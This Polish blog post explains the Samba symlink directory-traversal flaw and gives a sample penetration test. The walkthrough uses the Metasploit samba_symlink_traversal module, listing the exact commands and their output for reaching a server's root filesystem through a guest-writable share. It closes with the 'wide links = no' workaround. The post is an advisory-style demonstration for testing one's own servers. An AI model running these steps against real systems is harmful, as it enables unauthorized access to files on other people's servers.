09 lutego 2010

Luka w Sambie umożliwia dostęp do całego systemu plików serwera [przykładowy test penetracyjny]

wtorek, lutego 09, 2010 | Autor: \m/ojtek
Błąd związany z tworzeniem dowiązań symbolicznych obecny w wolnym serwerze plików i wydruku Samba pozwala dowolnym użytkownikom na dostęp do zbiorów znajdujących się również poza zdefiniowanymi udziałami.

Luka Remote Directory Traversal pozwala potencjalnemu intruzowi na dostęp do katalogu głównego (/) systemu jeśli tylko dysponuje on kontem na serwerze Samba (z prawem zapisu w przestrzeni określonej przynajmniej przez jeden udział) lub też anonimowo, jeśli tylko dowolny udział jest zdefiniowany jako zapisywalny (writeable) dla gości.

W celu wykorzystania tej niebezpiecznej luki intruz musi posłużyć się zmodyfikowanym klientem SMB. Odpowiedni exploit został już jednak upubliczniony. Każdy zainteresowany może przetestować podatność własnych serwerów Samba na potencjalny atak tego typu za pomocą przedstawionego poniżej testu penetracyjnego (wykonanego za pomocą Metasploit Framework w systemie Linux BackTrack 4 Final).
Podsumowując najważniejsze polecenia:
  • msf > use auxiliary/admin/smb/samba_symlink_traversal (wybór oraz wejście w tryb konfiguracji exploitu samba_symlink_traversal)
  • msf auxiliary(samba_symlink_traversal) > set RHOST 192.168.*.* (ustawienie adresu IP docelowego serwera Samba)
  • msf auxiliary(samba_symlink_traversal) > set SMBSHARE nagryw (ustawienie nazwy udziału zdefiniowanego jako zapisywalny dla gości)
  • msf auxiliary(samba_symlink_traversal) > set SMBTARGET rooted (ustawienie nazwy pozwalającej na dostęp do głównego katalogu serwera SAMBA)
  • msf auxiliary(samba_symlink_traversal) > run (uruchomienie exploitu samba_symlink_traversal)
W wyniku otrzymaliśmy następującą sekwencję komunikatów:
[*] Connecting to the server...
[*] Trying to mount writeable share 'shared'...
[*] Trying to link 'rooted' to the root filesystem...
[*] Now access the following share to browse the root filesystem:
[*] \\192.168.*.*\nagryw\rooted\
Zgodnie z otrzymanym komunikatem, dostęp do głównego katalogu serwera SAMBA możemy uzyskać w następujący sposób:
Zgodnie z wyjaśnieniami zespołu Samby usterka jest spowodowana tym, że serwer w ramach protokołu SMB/CIFS zezwala na tworzenie dowiązań symbolicznych i niedokładnie kontroluje wykonywane w ten sposób operacje. Błąd znaleziono w aktualnej wersji 3.4.5, ale występuje on również we wcześniejszych wydaniach Samby.

Twórcy Samby nie zdołali jeszcze przygotować odpowiedniej poprawki bezpieczeństwa, jednak jako tymczasowe obejście problemu zaleca się przełączenie w sekcji konfiguracyjnej [global] opcji wide links z yes na no i ponowne uruchomienie usługi. W przyszłych wersjach Samby prawdopodobnie parametr ten zostanie domyślnie zdefiniowany jako no. Zmiana tego parametru wystarcza, by wykonanie ataku nie było już możliwe (poniżej ilustracja nieudanej próby ataku).
Etykiety: , , , , , ,
Subskrybuj: Komentarze do posta (Atom)

Blogger Template created with Artisteer by Wojciech Smol.